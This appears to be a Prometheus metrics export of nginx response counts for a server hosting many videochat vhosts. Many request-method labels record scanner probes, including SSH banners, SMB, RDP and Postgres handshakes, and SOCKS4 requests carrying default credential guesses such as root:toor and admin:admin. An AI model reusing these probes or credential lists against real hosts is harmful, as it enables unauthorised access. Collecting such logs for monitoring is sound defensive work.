nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="zh.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="pt.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="504",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PRI",status="400",vhost="-"} 292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PROPFIND",status="405",vhost="161.97.120.25"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="af.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="fr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="he.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="ms.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="mt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="pl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="302",vhost="videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="af.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="am.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="be.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="chm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="eo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="es.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="fr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="gl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="gu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="hu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="it.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="jp.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ko.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lv.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mr.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ms.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="mt.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="my.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="nl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pl.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pt.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sk.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="uz.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="404",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="405",vhost="he.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="499",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="gl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="gu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="hr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="jp.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PUT",status="503",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-Go",status="400",vhost="-"} 107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-OpenSSH",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-OpenSSH_8.4p1",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-WanScannerBot",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="SSH-2.0-libssh_0.11.2",status="400",vhost="-"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="TDXP",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="TRACE",status="405",vhost="161.97.120.25:80"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="UNKNOWN",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="USER",status="400",vhost="-"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00%\\xFFSMBr\\x00\\x00\\x00\\x00\\x18\\x01(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00>\\x00\\x03\\x00\\x00user\\x00postgres\\x00database\\x00postgres\\x00client_encoding\\x00UTF8\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00\\x08\\x04\\xD2\\x16/",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x00\\x00f\\xFESMB@\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x02",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x80Y\\xC3\\xB4\\x19\\x99iO\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x82",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x82\\xBB\\x94\\xD2K\\xF6&N\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x87`h\\xE0\\x9A\\xF1\\xA2|\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x89\\xA6\\xA3\\xC8t\\x82\\xB1\\x86\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x97\\xA1\\x1CL",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x98\\x95\\xF9T\\x08\\xAE\\xC1\\xBB\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x99\\x15'\\xB3:\\x1BZo\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9As\\xA2g\\xB6\\x90\\x12\\xCA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\x9F^4_\\xAEX\\xB2g\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA0)\\x83\\xCD,\\xF5\\xE2\\xA4\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA0\\xD8\\xDA\\xDE\\x94\\x10\\xF8\\xAE\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA1\\x1B\\x8A\\x98_\\xAC\\x13\\xB4\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA4\\xB4\\x04\\xFB\\x92GL\\x8A\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xA5z\\xFB~\\xAE\\x17\\xBDE\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAB\\xF1\\x03\\x98\\xED>\\xC7\\xE7\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAD\\x1A\\xAC/}\\xD4\\xE9\\xA8\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xAD\\x8E\\xAD\\x99\\x90Duk\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xB3\\xE3T\\x83",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xB7\\xD2U\\xA6\\xB1*\\x83\\x8C\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xBA\\x0C4nXb'\\xB5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xBD!\\x1E\\x1BXJpk\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC4\\xAB?3\\xA1\\xC3vs\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC7=\\x1F\\xD3)\\xB6\\x14z\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC8\\xBA\\xF0\\x00\\x97\\xD4S\\xDA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xC9\\xFE\\xDB\\x16\\xFE\\xB8im\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xCD",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xD9\\x17\\xB9c\\x92\\x967\\xB0\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xDC~P\\xBF\\xBA{m\\x15\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xDE-\\x06\\x9B\\x13D\\xCC\\x87\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xE2\\xCD\\x07uA\\xDB\\x8Ec\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xEB\\x93\\x06z\\x04\\xF9\\xE1\\xF5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xF2\\xA2\\x99T\\x94\\xB9\\xD90\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xF6\\xB6\\xF5\\x19\\x93\\xE0\\xC9\\x07\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA,\\xBF\\xAE\\x9D\\x7F\\x9B\\xA5\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA1e_\\x8D\\x16\\x9B|\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFA\\xC5m\\xE7\\x0B\\x84\\xC2\\xFA\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x00\\x0E8\\xFB\\x99\\x9B\\xA3M\\x8E\\x10f\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x01\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x01\\x82\\x00\\x00\\x00\\x01,\\xEF:\\xE7\\x89\\xFEH\\xAF\\xAC\\xF8\\xC1Pq\\xD7\\xC3\\xE8S\\x8A\\xD6:\\x17\\xD93\\x14o)S}\\xBB\\xBB\\x97b\\xCE\\xB6\\x0B\\x9B\\xB97>\\x01\\xCFv\\xAE\\xA0E\\xB6D\\xEA\\xE1\\xEAA\\xC4\\xDB\\xEE\\x09\\xAC\\xFB\\xF0\\x84)k\\xBBc\\x18]V\\x85V\\xC5_\\x05T\\x0Bt\\xC4\\x0B\\xBE\\xB5w\\xBCM=[1\\xE1\\x06\\x9C\\xFD\\xD3g^\\xE3\\x01\\x9BK\\xD7\\xFC>\\xFFk\\xAF\\x95\\x99\\xFB\\xDBH\\x90\\x8BD\\x88`k\\x92\\xF5e\\x1C\\xAA\\xBB{_LP\\x15\\x85\\x1E\\x0E\\x8F\\xDD\\xC5J",status="400",vhost="-"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00&!\\xE0\\x00\\x00\\xFE\\xCA\\x00Cookie:",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00+&\\xE0\\x00\\x00\\x00\\x00\\x00Cookie:",status="400",vhost="-"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00/*\\xE0\\x00\\x00\\x00\\x00\\x00Cookie:",status="400",vhost="-"} 201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00",status="400",vhost="-"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x02\\x00\\x00\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x01\\xD6",status="400",vhost="-"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x03\\x00\\x00\\x00",status="400",vhost="-"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x0B\\x00\\x00\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x03\\x00\\x00\\x13\\x0E\\xE0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x0F\\x00\\x00\\x00",status="400",vhost="-"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x00\\x00\\x00\\x01\\x00example.com\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x01\\x01\\x01\\x01\\x00",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\x08\\x08\\x08\\x08\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%\\x00",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%admin:admin\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%admin:password\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%debian:debian\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%operator:operator\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:123456\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:root\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%root:toor\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%support:CxVn1geRkJQq0yUc\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%support:support\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%ubnt:ubnt\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%ubuntu:ubuntu\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%usario:usario\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%user:1234\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91%user:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:1234\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:admin123\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15admin:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15manager:manager\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15operator:operator\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:123456\\x00",status="400",vhost="-"} 1 